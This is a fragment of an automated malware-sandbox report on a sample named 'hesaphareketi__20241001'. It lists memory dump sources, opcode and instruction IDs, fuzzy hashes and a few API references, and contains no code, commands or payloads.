                                        • Instruction Fuzzy Hash: 5161E2B4E11219DFCB04CFA9E5859EEFBB2FB49310F149959D405AB314D730A942CFA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5eafbdafd80ccc08544cabec5969ade268ebb34f6be06c3c87f94af942c8b951
                                        • Instruction ID: 5a37e16f3366a3a8e55d87760ac8d63dbee45013a06891a59c9ffa8c81ffdac5
                                        • Opcode Fuzzy Hash: 5eafbdafd80ccc08544cabec5969ade268ebb34f6be06c3c87f94af942c8b951
                                        • Instruction Fuzzy Hash: CE5103B4E1121ADFCB04CFA9E5859EEFBF2FB89310F149956D405A7314D730AA41CB94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ea9544b7854b3d56b1c986f4b19b54d34755f1918ea5a981aceecf881d5ae082
                                        • Instruction ID: daaa4d6f2bfee55b13b620d5771ecf40df349f14962d7dffba4b0f8554ae2393
                                        • Opcode Fuzzy Hash: ea9544b7854b3d56b1c986f4b19b54d34755f1918ea5a981aceecf881d5ae082
                                        • Instruction Fuzzy Hash: D9510CB4E002598FDB14DFA9C9805AEFBF2FF89304F24C16AD458A7216D7349A42CF61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ebfce85e4e91ff6a87d02b0d5cc7151534011ecef56e2ccf7b114fe21c37d3a
                                        • Instruction ID: db584ce3856453fa942d35b2685f65573f2f74ac003acf1a7c9c6ccda21d6d8d
                                        • Opcode Fuzzy Hash: 9ebfce85e4e91ff6a87d02b0d5cc7151534011ecef56e2ccf7b114fe21c37d3a
                                        • Instruction Fuzzy Hash: 38511AB4E006198FDB14DFA9C9805AEFBF2FF89304F24C169D458AB216D7359A41CFA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ec08a0a4f1ee16b748a2930ec5ee34c52bd1c6bbcf25690675a6c351872b9385
                                        • Instruction ID: f5cf8e0013623c24afc31080752b39f83b536148f9a78e71e9e366c1ae2542cb
                                        • Opcode Fuzzy Hash: ec08a0a4f1ee16b748a2930ec5ee34c52bd1c6bbcf25690675a6c351872b9385
                                        • Instruction Fuzzy Hash: 4C51FAB4E002198BDB14CFA9C9805AEFBF6FF89305F24C169D418A7256D7359E42CFA1

                                        Execution Graph

                                        Execution Coverage:10.7%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:71
                                        Total number of Limit Nodes:8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,btq
                                        • API String ID: 0-3970051468
                                        • Opcode ID: 8c25a7798173bc0ad277897ae41e780e5cd6f63682b3376263f2002a30166b19
                                        • Instruction ID: 42129ff4f7a5a50d542e7a00f64f27912e7eb95ff0d9cbca01cfeeb2e7ff8a0c
                                        • Opcode Fuzzy Hash: 8c25a7798173bc0ad277897ae41e780e5cd6f63682b3376263f2002a30166b19
                                        • Instruction Fuzzy Hash: 0E331E31D107198ECB15EF68C8906ADF7B1FF99300F15D69AE449A7221EB70EAC5CB81

                                        Control-flow Graph

                                        • Legend: Executed / Not Executed (graph not reproduced)
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LR]q$LR]q
                                        • API String ID: 0-3917262905
                                        • Opcode ID: 8a6d15a51cb5ce04a08c8e49bfb56cefae631a8a343320310232cab201c656d7
                                        • Instruction ID: 4189b3556209a6b3bbea2eb1978fb2ab92743e4dd748a71c7349789835f85aa1
                                        • Opcode Fuzzy Hash: 8a6d15a51cb5ce04a08c8e49bfb56cefae631a8a343320310232cab201c656d7
                                        • Instruction Fuzzy Hash: 4F411431E102199FDB15DBB9C8547AEBBB6EFC5300F208529E805EB380EB75D886CB55

                                        Control-flow Graph

                                        • Legend: Executed / Not Executed (graph not reproduced)
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4615374310.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6260000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: a2fd9743916ad0f6424ebe0ab1505ac5c3c27cda9accaa1ba5a9e4277be25c7e
                                        • Instruction ID: 613e85a9050d2f72509d5caa9e76e2cd97ac22fe05882073b4577d0a477a1bf0
                                        • Opcode Fuzzy Hash: a2fd9743916ad0f6424ebe0ab1505ac5c3c27cda9accaa1ba5a9e4277be25c7e
                                        • Instruction Fuzzy Hash: 54B1A970A103058FCB54EF7AD88096EBBF6FF88310B148A69E846DB355DB74E845CB94

                                        Control-flow Graph

                                        • Legend: Executed / Not Executed (graph not reproduced)
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0626FD6A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4615374310.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6260000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 5f265831cd37f3098046b2ec7b65b7798a142213616a01a6ace99f47bfad9b23
                                        • Instruction ID: 10ce82ba22dd583e7817f65212de0b2ce1ddd45b3295cd279f148b08665a0bb4
                                        • Opcode Fuzzy Hash: 5f265831cd37f3098046b2ec7b65b7798a142213616a01a6ace99f47bfad9b23
                                        • Instruction Fuzzy Hash: DA51E2B1C10209AFCF15CF9AD984ADDBFB2FF48310F24815AE918AB220D7759881CF50

                                        Control-flow Graph

                                        • Legend: Executed / Not Executed (graph not reproduced)
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0626FD6A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4615374310.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6260000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 728cbe0c6407137f471f9b112e4cccda183de0e55ca11c8d74dae66368f5a78b
                                        • Instruction ID: 42d43102819d1627b61daf095e21711c98cbf770f6198907a9529178e3d1a7b6
                                        • Opcode Fuzzy Hash: 728cbe0c6407137f471f9b112e4cccda183de0e55ca11c8d74dae66368f5a78b
                                        • Instruction Fuzzy Hash: 3641B3B1D10309DFDF14CF9AD984ADDBBB5BF48310F24812AE819AB250D775A885CF90

                                        Control-flow Graph

                                        • Legend: Executed / Not Executed (graph not reproduced)
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0626EC16
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4615374310.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6260000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 084c3420b34067904b8b8026241dc09b0929a21d06781c33181e0d7d2042b416
                                        • Instruction ID: 4c19ffa5106a5b9cda2e4680510c16de63c838cda816e105751e83d359666adb
                                        • Opcode Fuzzy Hash: 084c3420b34067904b8b8026241dc09b0929a21d06781c33181e0d7d2042b416
                                        • Instruction Fuzzy Hash: 952190B5C193848FCB11CFAAC8406DEBFF4EF4A310F15849AD495A7251C3785549CFA1

                                        Control-flow Graph

                                        • Legend: Executed / Not Executed (graph not reproduced)
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0626EC16
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4615374310.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6260000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 2f4aae60a45b23937e9dbddc1aa3182a1a35f0f3dc2475c6c017a310b4958e4c
                                        • Instruction ID: e236810c1934b502219d9f7909469325e3cef993cd4f6636b9536f1153d0a030
                                        • Opcode Fuzzy Hash: 2f4aae60a45b23937e9dbddc1aa3182a1a35f0f3dc2475c6c017a310b4958e4c
                                        • Instruction Fuzzy Hash: 1B1120B5C043498FDB10DF9AC544A9EFBF4EB48310F10845AE859B7200D378A585CFA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH]q
                                        • API String ID: 0-3168235125
                                        • Opcode ID: 13b4db948388ea0fa4eee30fffd9a681ebd8e385d78ad56fd6c7f7c3aa89dec4
                                        • Instruction ID: f2e25b0df9e91dbe08924e72c6a0c94f42868bb295bb3a9b3d5468eb8551564e
                                        • Opcode Fuzzy Hash: 13b4db948388ea0fa4eee30fffd9a681ebd8e385d78ad56fd6c7f7c3aa89dec4
                                        • Instruction Fuzzy Hash: FA31D031B002118FDB199F74D66466E3BA3AF8A240F64886DD806EB385DF34DD86CB95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH]q
                                        • API String ID: 0-3168235125
                                        • Opcode ID: ff14f1ddbb74083b1ceb6b55d35ff182b4af54022dbb2ef20c953adcdab943fb
                                        • Instruction ID: 45c072fd1c9387c4da49d87c2b598f41f4eb612dd19335f5b933f0d40a7f53c5
                                        • Opcode Fuzzy Hash: ff14f1ddbb74083b1ceb6b55d35ff182b4af54022dbb2ef20c953adcdab943fb
                                        • Instruction Fuzzy Hash: 6831BD31B002118BDB19AF34955466E3BA7AF86200B60886DD806EB384DF34DD86CB95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LR]q
                                        • API String ID: 0-3081347316
                                        • Opcode ID: c2fe40809a65ec2c0c29a46785197257c38937dcb943958239f9ce7af8fae330
                                        • Instruction ID: 973e01d014a5b1349e9a447c757bdccf2d21f0ed9af7be5687a61f22dc79349d
                                        • Opcode Fuzzy Hash: c2fe40809a65ec2c0c29a46785197257c38937dcb943958239f9ce7af8fae330
                                        • Instruction Fuzzy Hash: 49318131E102199BEB24CFA5C84079EF7B6EF85314F608529E806EB240EB71D986CB55
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LR]q
                                        • API String ID: 0-3081347316
                                        • Opcode ID: 9e7f200f77eb73daae55824ad759ff3334f9c747c7f5db55f23825eea635a496
                                        • Instruction ID: a831fab8f3d93226ea178845e0bbc26426fa3ac44d7e8fb756d0000692ceccd1
                                        • Opcode Fuzzy Hash: 9e7f200f77eb73daae55824ad759ff3334f9c747c7f5db55f23825eea635a496
                                        • Instruction Fuzzy Hash: D221AA326182004FC702AB79C42035E7BF6EF86324F6049AED055C7392DE39D846C7E9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5cb2921cd76c89f9b5ba137330869325c052cad5babcfa63f7a1ffabdfb3996a
                                        • Instruction ID: 9d40c00286dc6db7255e1d917e7a911feae556b86db88dd7ae1515c36ad38585
                                        • Opcode Fuzzy Hash: 5cb2921cd76c89f9b5ba137330869325c052cad5babcfa63f7a1ffabdfb3996a
                                        • Instruction Fuzzy Hash: 83917F70E00259DFDF24CFA9C94579DBBF1AF88304F248129E809A7254DB74D9C5CB85
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f4ed2cebca23b839141104fc43302b11730d1128c6db74204e8af2569d5d55f8
                                        • Instruction ID: 368bbb4503740df8f5e0281e3aa826ca5a7dbb5dd28936bc239207138a3f355f
                                        • Opcode Fuzzy Hash: f4ed2cebca23b839141104fc43302b11730d1128c6db74204e8af2569d5d55f8
                                        • Instruction Fuzzy Hash: E1718CB0E00259DFDF28CFA9C84179EBBF6BF88314F148029E804A7254DB7499C1CB95
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cd82995ba9f8df34da174ec4b79a487dd46c5a064d491718a23bb8c08e22ae9a
                                        • Instruction ID: 8dc60223f5fc51486a9ec9cdcaeeb86d9c2f8d58de6071ef92f8e395d68f111c
                                        • Opcode Fuzzy Hash: cd82995ba9f8df34da174ec4b79a487dd46c5a064d491718a23bb8c08e22ae9a
                                        • Instruction Fuzzy Hash: FC716BB0E00259DFDF24CFA9C94579EBBF5BF88314F148129E808A7254DB7499C1CB99
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e918b6dae5189236e1936d0e81b70ccb433c4bef6519d5ee4e61d83136d800bb
                                        • Instruction ID: 7fcb7876635b4b5d527e731ade4312fe7447ed53c25dee0f38928c11d8d53d3a
                                        • Opcode Fuzzy Hash: e918b6dae5189236e1936d0e81b70ccb433c4bef6519d5ee4e61d83136d800bb
                                        • Instruction Fuzzy Hash: 7A5155B0D002288FDB14CFA9C84579DBBF5FF48314F64842AE819AB390D7789880CF99
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a17414da1b22223e446f28ad27acfaead76c963f4789fc8bcb6d992faa8d9b3e
                                        • Instruction ID: da079975184573d43cfb225d4a79a3c25ebd9ea3fb3f1311c2543c6dec1892bc
                                        • Opcode Fuzzy Hash: a17414da1b22223e446f28ad27acfaead76c963f4789fc8bcb6d992faa8d9b3e
                                        • Instruction Fuzzy Hash: 34512470D002288FDB14CFAAC844B9DFBB5BF48314F648519E819AB350D774A985CF99
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 906e633254ef458f36419eca73e3a80ef465cfb1c4fb3bbef7fb34843eea49f3
                                        • Instruction ID: b37a1eb93764ba6c968e5bdee67dafd33add989d8ea20775d729f860caca12fe
                                        • Opcode Fuzzy Hash: 906e633254ef458f36419eca73e3a80ef465cfb1c4fb3bbef7fb34843eea49f3
                                        • Instruction Fuzzy Hash: 0C41EB32952181CFCB0AFF29F9819553F69FB593047044969D0859B33EFB30A90ADF90
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c822d93f7ea32fbd4caee588949e31600d6466bb89a173e09f0e73649056f30d
                                        • Instruction ID: 12f163f01e18cf8a61d2d2d2df7e4381e8bc532c8fe4d6a1f52f334d7eeb5658
                                        • Opcode Fuzzy Hash: c822d93f7ea32fbd4caee588949e31600d6466bb89a173e09f0e73649056f30d
                                        • Instruction Fuzzy Hash: B24146B0C00259DFDB10CF99C994AEEBFF4BF48304F108429E805AB250DB75A986CF95
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42c785739d56e1369f69cf214160c59fbde2f09b3231c4f04c3cafea590e9971
                                        • Instruction ID: 727f22f44bca4f0a5a21b39770ffc44093a75434ce708f3210e8701fe19b58aa
                                        • Opcode Fuzzy Hash: 42c785739d56e1369f69cf214160c59fbde2f09b3231c4f04c3cafea590e9971
                                        • Instruction Fuzzy Hash: 2941CA72A52181CFCB0AFF29F9809553F69FB593047008969D0859B33DFB74A90ADB94
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6f2f053a77f067554e2de54eaa399e257368bdfa03a66c20151cadeb7b8bbcb4
                                        • Instruction ID: 89d5d71e05d68cb1a7410a60d4c110a24a5be7894e3fcdca7e2aa4ea6f465704
                                        • Opcode Fuzzy Hash: 6f2f053a77f067554e2de54eaa399e257368bdfa03a66c20151cadeb7b8bbcb4
                                        • Instruction Fuzzy Hash: 7A319035E102169BCB19DF64D4946AEB7B2AF89300F14C529E80AE7750DB70ED86CB40
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2c44a80c6221b1d600e84909d30ef0d9fc70efbc58313b899a966cf653754e0
                                        • Instruction ID: d3189a6ba037293ca604b0646f0d7b7aa259b2e66530be79ddc788eb164a3640
                                        • Opcode Fuzzy Hash: b2c44a80c6221b1d600e84909d30ef0d9fc70efbc58313b899a966cf653754e0
                                        • Instruction Fuzzy Hash: B3319E35E002169BDB19CF64D49469EB7B2BF8A304F14C529EC0AE7750DB70ED86CB80
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f77240ad7e6472f56118551b1d6b3f92ecfea47a2d386ea25360e674bec74272
                                        • Instruction ID: 6de912f81b1147f3786a7388dcb0f97f2e436bb4faa89b0ce2a62951e07f1fd4
                                        • Opcode Fuzzy Hash: f77240ad7e6472f56118551b1d6b3f92ecfea47a2d386ea25360e674bec74272
                                        • Instruction Fuzzy Hash: 94410EB0D002499FDB10CFA9C580ADEBFF1FF48310F24802AE809AB250DB34A985CF95
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0645e45a8c934069921aa990a367cc1f52eb4290522db69ca436d25c2c5153cc
                                        • Instruction ID: ed76f6d7bd4e4e45e2b3d1367c857878e0d9df963463c7afe5e91fe94c1e002e
                                        • Opcode Fuzzy Hash: 0645e45a8c934069921aa990a367cc1f52eb4290522db69ca436d25c2c5153cc
                                        • Instruction Fuzzy Hash: 8641FDB0D002499FDB14DFA9C580ADEBFF5FF48310F24802AE809AB210DB75A985CB95
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 515d0bafc44929b6000368be5ec6aca4bbc04f97670d989eccb5fbbdf016a2b7
                                        • Instruction ID: 1ce393f8e28ace467c6f074d64ebfe08890e383de02cb1b079affce8d8084fed
                                        • Opcode Fuzzy Hash: 515d0bafc44929b6000368be5ec6aca4bbc04f97670d989eccb5fbbdf016a2b7
                                        • Instruction Fuzzy Hash: 1D316031A00264CFDB14EB74CA547AE77B2AF89345F50086CD806AB3A4EB36DD85CBD5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e2b859157a5c82cf20ec0351cf81a0ee76cc71688ac5ed89d9d961c7ac4f661
                                        • Instruction ID: 7bc5503fca4186edbe4ab921ff632d12c1778e92864480f4205d51f4b8681b81
                                        • Opcode Fuzzy Hash: 3e2b859157a5c82cf20ec0351cf81a0ee76cc71688ac5ed89d9d961c7ac4f661
                                        • Instruction Fuzzy Hash: 8E318035A00260CFDF14EB74CA547AD77B2AF89349F50086CC806AB364EB36DD85CB95
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f6fe4eb7b5d01eeadf6cc43d409ce9c11e60caaedc6016e90a9f00cab4c35d24
                                        • Instruction ID: 01f70f484301d447214c84f112059bfb3067c9d0c6f5cbe6bacf4631fd4766cd
                                        • Opcode Fuzzy Hash: f6fe4eb7b5d01eeadf6cc43d409ce9c11e60caaedc6016e90a9f00cab4c35d24
                                        • Instruction Fuzzy Hash: 6A318031E1021ADBCB05CFA5D49469EBBB6EF89300F14C559E809EB351EB70D986CB91
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ae1f5cd069a8fd08fb770afdefd7e0efa461abb532c9f04bdb7773ec49bda0cc
                                        • Instruction ID: 6a3ee99afe13a42bb2d7a790597900ba140bacd5de179852254c347f8e561517
                                        • Opcode Fuzzy Hash: ae1f5cd069a8fd08fb770afdefd7e0efa461abb532c9f04bdb7773ec49bda0cc
                                        • Instruction Fuzzy Hash: 2B216F31A0021ADBDB05CF65D49069EB7B6EFC9300F14C569E809EB350EB70D986CB91
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: febd7b6db9ac0dd1b9ef8c0d12428ad109d8a01bd257ca199872bf2ce8bc7aef
                                        • Instruction ID: 65a6f544ab2aa18cf0985f40d13716f9e8021a3a98126cee0253ad76826db5b2
                                        • Opcode Fuzzy Hash: febd7b6db9ac0dd1b9ef8c0d12428ad109d8a01bd257ca199872bf2ce8bc7aef
                                        • Instruction Fuzzy Hash: 5621A475A102608BDF355624E4AD32E3A51EF81365F580839ED0EC7384EFA9C9C5C78E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: afc705a73d5a8c176135dcbe164d94785c2f076849faa9cf51012f167abc8105
                                        • Instruction ID: 0c4a32de864cdfd72520fc3066c59d539e2738ca234bab974898f2e475a699b6
                                        • Opcode Fuzzy Hash: afc705a73d5a8c176135dcbe164d94785c2f076849faa9cf51012f167abc8105
                                        • Instruction Fuzzy Hash: 5321A131E04219DBDB09CFA5C854A9EFBB6AF89300F14855AEC16FB340DB70D986CB95
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd2be7332009bdc4055ac1723eb3ef0e58a7feb647c7515663c39ac02cc5c065
                                        • Instruction ID: c10bcab54d7d0a0241ed4f04e7b34f2c8083100471b192cbfb41cae612b838ba
                                        • Opcode Fuzzy Hash: dd2be7332009bdc4055ac1723eb3ef0e58a7feb647c7515663c39ac02cc5c065
                                        • Instruction Fuzzy Hash: FC21F6356101114FDF12EB38F889B5A3B69EB84394F044A34E409C73A9EF78D986CBC9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4609711465.0000000002ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ADD000, based on PE: false
                                        Joe Sandbox IDA Plugin
